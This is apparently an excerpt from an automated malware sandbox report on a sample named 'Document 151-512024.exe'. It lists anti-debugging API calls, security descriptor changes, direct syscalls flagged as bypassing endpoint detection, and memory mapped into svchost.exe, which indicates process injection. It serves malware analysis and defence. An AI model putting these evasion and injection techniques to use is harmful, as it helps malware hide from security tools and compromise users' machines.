Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]	2_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]	2_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404B00 mov eax, dword ptr fs:[00000030h]	2_2_03404B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]	2_2_0332CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328B50 mov eax, dword ptr fs:[00000030h]	2_2_03328B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]	2_2_033DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]	2_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]	2_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]	2_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]	2_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]	2_2_033D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]	2_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]	2_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]	2_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]	2_2_0335EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_033BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_033DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]	2_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]	2_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]	2_2_0336CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]	2_2_0336CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]	2_2_0335EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]	2_2_033BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]	2_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]	2_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]	2_2_033DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]	2_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]	2_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]	2_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]	2_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]	2_2_03386AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]	2_2_03368A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]	2_2_03404A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]	2_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]	2_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]	2_2_03330AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]	2_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]	2_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404940 mov eax, dword ptr fs:[00000030h]	2_2_03404940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]	2_2_033B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]	2_2_033C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]	2_2_033BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]	2_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]	2_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]	2_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]	2_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]	2_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]	2_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]	2_2_033BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]	2_2_033B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]	2_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]	2_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]	2_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]	2_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_033BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]	2_2_033649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_033FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]	2_2_033C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]	2_2_0336A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]	2_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]	2_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]	2_2_033BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]	2_2_033BE872

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_009A0B62

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00972622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00972622
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_0096083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0096083F
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009609D5 SetUnhandledExceptionFilter,	0_2_009609D5
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_00960C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00960C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtOpenKeyEx: Direct from: 0x77672B9C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtProtectVirtualMemory: Direct from: 0x77672F9C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtCreateFile: Direct from: 0x77672FEC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtOpenFile: Direct from: 0x77672DCC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtTerminateThread: Direct from: 0x77672FCC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtProtectVirtualMemory: Direct from: 0x77667B2E	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtQueryInformationToken: Direct from: 0x77672CAC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtQueryValueKey: Direct from: 0x77672BEC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtDeviceIoControlFile: Direct from: 0x77672AEC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtQuerySystemInformation: Direct from: 0x776748CC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtQueryAttributesFile: Direct from: 0x77672E6C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtSetInformationThread: Direct from: 0x77672B4C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtOpenSection: Direct from: 0x77672E0C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtQueryVolumeInformationFile: Direct from: 0x77672F2C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtAllocateVirtualMemory: Direct from: 0x776748EC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtSetInformationThread: Direct from: 0x776663F9	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtReadVirtualMemory: Direct from: 0x77672E8C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtCreateKey: Direct from: 0x77672C6C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtWriteVirtualMemory: Direct from: 0x7767490C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtOpenKeyEx: Direct from: 0x77673C9C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtDelayExecution: Direct from: 0x77672DDC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtCreateUserProcess: Direct from: 0x7767371C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtQuerySystemInformation: Direct from: 0x77672DFC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtQueryInformationProcess: Direct from: 0x77672C26	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtResumeThread: Direct from: 0x77672FBC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtReadFile: Direct from: 0x77672ADC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtAllocateVirtualMemory: Direct from: 0x77672BFC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtResumeThread: Direct from: 0x776736AC	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtSetInformationProcess: Direct from: 0x77672C5C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtMapViewOfSection: Direct from: 0x77672D1C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtNotifyChangeKey: Direct from: 0x77673C2C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtWriteVirtualMemory: Direct from: 0x77672E3C	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	NtCreateMutant: Direct from: 0x776735CC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Document 151-512024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
